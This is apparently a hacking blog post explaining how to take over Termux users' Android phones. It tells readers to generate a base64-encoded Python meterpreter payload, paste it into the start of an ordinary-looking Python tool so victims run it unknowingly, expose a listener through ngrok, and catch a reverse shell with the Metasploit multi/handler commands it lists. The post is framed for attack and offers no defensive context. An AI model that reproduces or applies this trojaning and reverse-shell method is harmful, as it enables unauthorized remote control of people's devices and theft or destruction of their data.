Hey, guys am back with another exciting post of android hacking today am going to show you is that how easy to make access on Termux users android device. You can access, write data in storage, Remove, edit and run a shell on the target device remotely and the amazing thing about that is you didn't need to install any apk file in target android. So let's get started.
So basically we need to make a python base64 coded payload and bind or hide it in any other python file to the python tool. Just follow the steps smartly and try to understand what we do so you didn't face any error.
Step 1. Do Port Forwarding
- We can use ngrok for temporary port forwarding
- Visit this post to configure and do port forwarding with ngrok
Step 2. Make Python Payload
- We use Mob-Droid tool to make python payload
- Check this post for Mob-Droid Setup and Usage
Step 3. Hide Python Payload In File
- Once you successfully make a python payload then edit it with any txt editor and copy the whole code of file.
- Edit the main file using txt editor in which you want to hide payload
- Paste the code at starting of the main file code and save it
Step 4. Exploit Payload With Metasploit
- Start metasploit console using " $ msfcosnole "
- Start multi handler " $ use multi/handler "
- Set payload " $ set payload python/meterpreter/reverse_tcp "
- Set local host " $ set lhost (Enter local host) "
- Set local port " $ set lport (Enter local port) "
- Now run the exploit " $ exploit "